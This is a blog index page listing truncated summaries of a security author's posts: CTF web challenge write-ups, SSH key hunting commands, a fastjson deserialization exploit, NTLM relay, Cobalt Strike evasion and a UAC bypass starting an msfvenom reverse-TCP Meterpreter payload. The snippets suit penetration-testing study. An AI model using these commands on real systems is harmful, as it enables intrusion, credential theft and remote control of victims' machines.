上一页 1 2 3 4 5 6 7 8 ··· 15 下一页
摘要: 1.web69 和上题一样 payload: c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");} #扫描根目录有什么文件 c=$a=new DirectoryIterator(' 阅读全文
posted @ 2024-08-30 18:01 mushangqiujin 阅读(63) 评论(0) 推荐(0)
摘要: 0x01 一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜索已保存的SSH凭证 ~/.ssh/config ~/.ssh/known_hosts ~/.bash_history grep -ir "BEGIN RSA PRIVATE KEY" /* grep -ir "BEGIN DS 阅读全文
posted @ 2024-08-25 12:55 mushangqiujin 阅读(143) 评论(0) 推荐(0)
摘要: 一.fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349) fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链 影响范围:Fastj 阅读全文
posted @ 2024-08-22 15:55 mushangqiujin 阅读(138) 评论(0) 推荐(0)
摘要: 1.web254 定义了一个类ctfshowuser,定义了三个变量,定义了了三个函数,这题只要使isVip变量为true即可,就是传入的username和password和原来定义的变量值相等 payload: username=xxxxxx&password=xxxxxx 2.web255 这题 阅读全文
posted @ 2024-08-20 00:33 mushangqiujin 阅读(240) 评论(0) 推荐(0)
摘要: 0x01 bypassuac提权 UAC是一个账户访问控制,运行一些程序时,会提醒是否运行这个程序 一.msf绕过uac 环境:win10,win7 管理员用户组的用户 #生成木马 msfvenom -p windows/meterpreter/reverse_tcp lport=4444 lhos 阅读全文
posted @ 2024-08-18 23:35 mushangqiujin 阅读(224) 评论(0) 推荐(0)
摘要: 横向移动 NTLM中继攻击 Relay重放(smb) 适用于无法获取hash或密码时使用 NTML Relay重放包括smb to relay ldap ews webserver: 执行下面的命令时会默认以当前用户名和密码去登录目标计算机 dir \\ 192.168.3.32\c$ webser 阅读全文
posted @ 2024-08-18 10:34 mushangqiujin 阅读(125) 评论(0) 推荐(0)
摘要: 1.web89 intval函数的利用,intval函数获取变量的整数值,失败时返回0,空的数组返回,非空数组返回1 num[]=1 intval ( mixed $var [, int $base = 10 ] ) : int Note: 如果 base 是 0,通过检测 var 的格式来决定使用 阅读全文
posted @ 2024-08-17 16:14 mushangqiujin 阅读(214) 评论(0) 推荐(0)
摘要: 0x00 cspowershell模式 使用cs生成powershell有两种模式,一种是文件模式,后缀为ps1,另一种是命令模式,后缀是txt 文件模式,使用powershell直接运行 命令模式,全部内容复制到cmd直接运行,注意不需要进入powershell在执行 0x01 免杀方式 混淆 b 阅读全文
posted @ 2024-08-16 18:18 mushangqiujin 阅读(47) 评论(0) 推荐(0)
摘要: 一、安装apache服务 1.挂载镜像,设备状态全选,在选择iso镜像文件 桌面出现光盘图标为挂载成功 在终端打开输入以下命令 mount /dev/sr0 /mnt 出现下图为成功 2.配置yum源(方便解决依赖关系) 输入以下命令 cd /etc/yum.repos.d rm -rf * vim 阅读全文
posted @ 2024-08-15 09:25 mushangqiujin 阅读(49) 评论(0) 推荐(0)
摘要: 1.弱口令 试了几个比较常用的组合不行 admin 123456 admin admin admin admin888 admin admin888登录成功,得到flag 正常来说是使用burp抓包,发送到intruder模块,找比较常用的用户名和密码字典进行爆破 2.默认密码 尝试在网络上查找对应 阅读全文
posted @ 2024-08-14 12:52 mushangqiujin 阅读(404) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 8 ··· 15 下一页